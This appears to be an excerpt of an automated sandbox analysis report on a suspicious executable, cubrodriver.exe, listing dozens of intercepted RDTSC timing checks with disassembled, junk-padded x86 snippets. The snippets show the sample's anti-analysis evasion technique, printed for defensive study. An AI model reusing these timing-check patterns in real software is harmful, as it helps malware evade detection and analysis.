                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D9309 second address: 5D930F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5D930F second address: 5D9313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5DF5AB second address: 5DF5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F01B44E8C96h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5DF5B5 second address: 5DF5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDAh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jbe 00007F01B4D45EE8h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5DED68 second address: 5DED7C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d jns 00007F01B44E8C96h 0x00000013 pop edi 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5E2B0C second address: 5E2B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F01B4D45ED6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5E2B21 second address: 5E2B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jg 00007F01B44E8CACh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5E88CB second address: 5E8905 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F01B4D45EE7h 0x0000000f pushad 0x00000010 ja 00007F01B4D45ED6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5E8905 second address: 5E890B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5E890B second address: 5E8914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5E915B second address: 5E9166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F01B44E8C96h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5E93F9 second address: 5E940B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push ecx 0x0000000a je 00007F01B4D45ED6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5E940B second address: 5E9416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5E9416 second address: 5E941C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5758F0 second address: 575903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F01B44E8C96h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 575903 second address: 57590D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F01B4D45ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 57590D second address: 575917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 575917 second address: 57592B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F01B4D45ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F01B4D45EDCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F3BF3 second address: 5F3BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F2A8F second address: 5F2A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F2A95 second address: 5F2A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F32E5 second address: 5F32EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F32EB second address: 5F32EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F32EF second address: 5F32F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F32F3 second address: 5F3303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F01B44E8C9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F3303 second address: 5F3307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F3307 second address: 5F3336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F01B44E8C9Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edi 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007F01B44E8C96h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 5F3336 second address: 5F333A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 573F2B second address: 573F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F01B44E8C96h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 573F38 second address: 573F52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F01B4D45ED6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F01B4D45EDBh 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9548 second address: 5B954C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B964F second address: 5B9653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B97FD second address: 5B9801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9801 second address: 5B980F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B980F second address: 5B9831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9831 second address: 5B9837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9837 second address: 5B983E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9900 second address: 5B9905 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9905 second address: 5B9928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B44E8CA8h 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9A00 second address: 5B9A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9A06 second address: 5B9A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9BEB second address: 5B9C2B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F01B4D45EDCh 0x00000008 jnc 00007F01B4D45ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F01B4D45ED8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d push 00000004h 0x0000002f mov dword ptr [ebp+122D1AF7h], ebx 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9C2B second address: 5B9C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9F88 second address: 5B9FBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F01B4D45ED8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 0000001Eh 0x00000027 mov cx, dx 0x0000002a push eax 0x0000002b pushad 0x0000002c jng 00007F01B4D45EDCh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5BA10F second address: 5BA113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5BA2EE second address: 5BA37A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edx, dword ptr [ebp+122D37F3h] 0x00000013 lea eax, dword ptr [ebp+12480E77h] 0x00000019 or ecx, dword ptr [ebp+122D1E12h] 0x0000001f push eax 0x00000020 jmp 00007F01B4D45EDEh 0x00000025 mov dword ptr [esp], eax 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F01B4D45ED8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov dx, A281h 0x00000046 lea eax, dword ptr [ebp+12480E33h] 0x0000004c call 00007F01B4D45EE1h 0x00000051 or ecx, 6AF457FFh 0x00000057 pop ecx 0x00000058 nop 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5BA37A second address: 5BA39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8CA8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F01B44E8C96h 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FC22D second address: 5FC231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FC231 second address: 5FC23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FC3AF second address: 5FC3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FC520 second address: 5FC526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FC91C second address: 5FC921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FCA95 second address: 5FCA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FCA99 second address: 5FCA9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FCBEC second address: 5FCBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FCBF5 second address: 5FCBFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5FCBFB second address: 5FCC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8CA2h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6019B3 second address: 6019B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 601AE8 second address: 601AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 601AF0 second address: 601B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F01B4D45ED6h 0x0000000a popad 0x0000000b jg 00007F01B4D45F07h 0x00000011 jo 00007F01B4D45EDEh 0x00000017 jnc 00007F01B4D45ED6h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 601B13 second address: 601B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 601B17 second address: 601B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 60247E second address: 602482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 602482 second address: 6024C9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F01B4D45EDEh 0x0000000f jmp 00007F01B4D45EDFh 0x00000014 push edi 0x00000015 ja 00007F01B4D45ED6h 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F01B4D45EDFh 0x00000025 push eax 0x00000026 pop eax 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 604D5E second address: 604D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F01B44E8C96h 0x0000000b jmp 00007F01B44E8CA1h 0x00000010 jg 00007F01B44E8C96h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F01B44E8C9Ah 0x00000020 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 60724F second address: 607255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 607255 second address: 60725F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F01B44E8C96h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6073F8 second address: 60742A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d ja 00007F01B4D45ED6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 popad 0x00000017 jo 00007F01B4D45EF0h 0x0000001d jmp 00007F01B4D45EDAh 0x00000022 pushad 0x00000023 ja 00007F01B4D45ED6h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6076FC second address: 607700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 607700 second address: 607713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F01B4D45EDAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 60C47C second address: 60C489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 60C489 second address: 60C493 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F01B4D45ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 60BC8D second address: 60BC93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 60BF31 second address: 60BF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 611857 second address: 61185D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61185D second address: 611861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 610383 second address: 610395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F01B44E8C9Bh 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 610395 second address: 61039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61039A second address: 6103A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6103A9 second address: 6103AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6108A5 second address: 6108B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F01B44E8C96h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6108B7 second address: 6108C5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9DC0 second address: 5B9DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 5B9DC4 second address: 5B9DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
